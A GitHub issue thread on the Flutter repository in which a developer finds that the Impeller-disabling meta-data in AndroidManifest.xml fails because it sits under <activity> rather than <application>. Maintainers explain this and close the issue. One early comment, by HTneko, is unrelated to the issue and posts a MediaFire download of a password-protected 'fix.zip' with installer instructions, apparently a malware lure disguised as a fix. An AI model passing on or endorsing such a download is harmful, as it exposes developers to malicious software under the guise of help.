### ISSUE TITLE
`io.flutter.embedding.android.EnableImpeller` does not turn off Impeller when set to `false`

### ISSUE THREAD

**Issue by RoarGronmo** [flutter/flutter#154252] opened 2024-08-28 10:38 UTC
When working on issue #154103,  I tried to turn off Impeller with this sentence in `AndroidManifest.xml`, setting this `meta-data`: 
```
            <meta-data
              android:name="io.flutter.embedding.android.EnableImpeller"
              android:value="false" />
```
in the `activity` section.

I expected it to have same effect as running 
`flutter run --no-enable-impeller`, but it didn't have any effect. 

Does this `meta-data` entry work at all ?

Following is an example of `/android/app/src/main/AndroidManifest.xml` file.

```
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
    <application
        android:label="test_black_screen"
        android:name="${applicationName}"
        android:icon="@mipmap/ic_launcher">
        <activity
            android:name=".MainActivity"
            android:exported="true"
            android:launchMode="singleTop"
            android:taskAffinity=""
            android:theme="@style/LaunchTheme"
            android:configChanges="orientation|keyboardHidden|keyboard|screenSize|smallestScreenSize|locale|layoutDirection|fontScale|screenLayout|density|uiMode"
            android:hardwareAccelerated="true"
            android:windowSoftInputMode="adjustResize">
            <!-- Specifies an Android theme to apply to this Activity as soon as
                 the Android process has started. This theme is visible to the user
                 while the Flutter UI initializes. After that, this theme continues
                 to determine the Window background behind the Flutter UI. -->

            <meta-data
              android:name="io.flutter.embedding.android.EnableImpeller"
              android:value="false" />

            <meta-data
              android:name="io.flutter.embedding.android.NormalTheme"
              android:resource="@style/NormalTheme" />

            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>

        </activity>
        <!-- Don't delete the meta-data below.
             This is used by the Flutter tool to generate GeneratedPluginRegistrant.java -->
        <meta-data
            android:name="flutterEmbedding"
            android:value="2" />
    </application>
    <!-- Required to query activities that can process text, see:
         https://developer.android.com/training/package-visibility and
         https://developer.android.com/reference/android/content/Intent#ACTION_PROCESS_TEXT.

         In particular, this is used by the Flutter engine in io.flutter.plugin.text.ProcessTextPlugin. -->
    <queries>
        <intent>
            <action android:name="android.intent.action.PROCESS_TEXT"/>
            <data android:mimeType="text/plain"/>
        </intent>
    </queries>
</manifest>

``` 

Flutter doctor:
```
[√] Flutter (Channel beta, 3.25.0-0.1.pre, on Microsoft Windows [Version 10.0.22631.4037], locale nb-NO)
    • Flutter version 3.25.0-0.1.pre on channel beta at C:\Flutter\flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision d3733fcb0e (7 days ago), 2024-08-21 10:27:04 -0500
    • Engine revision 062b3a72fc
    • Dart version 3.6.0 (build 3.6.0-149.3.beta)
    • DevTools version 2.38.0

[√] Windows Version (Installed version of Windows is version 10 or higher)

[√] Android toolchain - develop for Android devices (Android SDK version 35.0.0)
    • Android SDK at c:/android/sdk
    • Platform android-35, build-tools 35.0.0
    • Java binary at: c:\program files\java\jdk-17\bin\java
    • Java version Java(TM) SE Runtime Environment (build 17.0.11+7-LTS-207)
    • All Android licenses accepted.

[√] Chrome - develop for the web
    • Chrome at C:\Program Files\Google\Chrome\Application\chrome.exe

[√] Visual Studio - develop Windows apps (Visual Studio Community 2022 17.10.1)
    • Visual Studio at C:\Program Files\Microsoft Visual Studio\2022\Community
    • Visual Studio Community 2022 version 17.10.34928.147
    • Windows 10 SDK version 10.0.22621.0

[√] Android Studio (version 2023.3)
    • Android Studio at C:\Program Files\Android Studio\Android Studio 2023.3.1.20
    • Flutter plugin can be installed from:
       https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
       https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.10+0--11572160)

[√] Android Studio (version 2024.1)
    • Android Studio at C:\Program Files\Android Studio\Android Studio 2024.1.1.13
    • Flutter plugin can be installed from:
       https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
       https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.11+0--11852314)

[√] Android Studio (version 2024.1)
    • Android Studio at C:\Program Files\Android Studio\Android Studio 2024.1.2.8
    • Flutter plugin can be installed from:
       https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
       https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.11+0--11852314)

[√] Android Studio (version 2024.2)
    • Android Studio at C:\Program Files\Android Studio\Android Studio 2024.2.1.3
    • Flutter plugin can be installed from:
       https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
       https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 21.0.3+-12099254-b509.4)

[√] Connected device (5 available)
    • SM T515 (mobile)  • R52NB09L7ZP • android-arm    • Android 11 (API 30)
    • SM S926B (mobile) • R5CWC4KYWSH • android-arm64  • Android 14 (API 34)
    • Windows (desktop) • windows     • windows-x64    • Microsoft Windows [Version 10.0.22631.4037]
    • Chrome (web)      • chrome      • web-javascript • Google Chrome 128.0.6613.85
    • Edge (web)        • edge        • web-javascript • Microsoft Edge 128.0.2739.42

[√] Network resources
    • All expected network resources are available.

• No issues found!

```

**Comment by HTneko** [comment] 2024-08-28 10:49
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by reidbaker** [comment] 2024-08-28 14:37
@chinmaygarde is this a class of error we can/should warn on? Checking the flutter activity for impeller tag and logging a warning

**Comment by RoarGronmo** [comment] 2024-08-28 17:36
> Hi @RoarGronmo, you set the `meta-data` tag in the wrong place. For impeller, It is supposed to be in the `application` tag not the `activity` tag. 
> 
> Kindly move it to the `application` tag and check again to see if impeller is still enabled

Oh...

...tried to move it down into the application section and it worked !

Thanx.

**Comment by RoarGronmo** [comment] 2024-08-28 17:38
> @chinmaygarde is this a class of error we can/should warn on? Checking the flutter activity for impeller tag and logging a warning

I would certainly prefer that...

**Comment by chinmaygarde** [comment] 2024-08-28 18:18
> class of error we can/should warn on

I ran into a similar issue yesterday and it was a case of missing documentation on another key. So I do think such a check would be valuable. Don't see a quick fix but filed https://github.com/flutter/flutter/issues/154282 with a suggestion. Please add more if you have any. This applies to all metadata keys and we often flub this.

@RoarGronmo: It seems like you are unblocked? Can you also let us know where you read the guidance to add the keys. I'll make sure the documentation mentions that the tag must go under the `<application>` tag. But otherwise, this key works as documented.

**Comment by RoarGronmo** [comment] 2024-08-28 18:41
> > class of error we can/should warn on
> 
> I ran into a similar issue yesterday and it was a case of missing documentation on another key. So I do think such a check would be valuable. Don't see a quick fix but filed #154282 with a suggestion. Please add more if you have any. This applies to all metadata keys and we often flub this.
> 
> @RoarGronmo: It seems like you are unblocked? Can you also let us know where you read the guidance to add the keys. I'll make sure the documentation mentions that the tag must go under the `<application>` tag. But otherwise, this key works as documented.

In that moment of stress, I cannot remember if I read `<application>` or `<activity>` when I checked where I should enter the `meta-data` entry in the documentation on impeller, to turn it off, as it was from Flutter Beta `3.25.0++` enabled by default on android. I may by "tempted" to put in under `<activity>` as there was another `meta-data` entry there.

![image](https://github.com/user-attachments/assets/1667869d-f736-49f5-801e-269c6e19976c)

But sure as you see now, they say `<application>`. 

But, from another "inexperienced" perspective, is actually `<activity>` "inside" `<application>` and you add it there in goof beliefs.

Just getting a warning that you have put the `impeller` `meta-data` entry in the wrong place is very affordable !!

**Comment by jonahwilliams** [comment] 2024-08-28 19:17
Can we just update the Impeller docs on the website to document which tag it goes under? Seems a lot more straightforward than updating the tooling.

**Comment by chinmaygarde** [comment] 2024-08-28 19:41
The docs are already correct. Its just a mistake thats easy to make. In any case, the task to make this easier is being tracked in the linked bug. This is working as intended and documented correctly. Closing this. We can prioritize the issue to log a warning separately.

**Closed by chinmaygarde** 2024-08-28 19:41 UTC
Labels: in triage
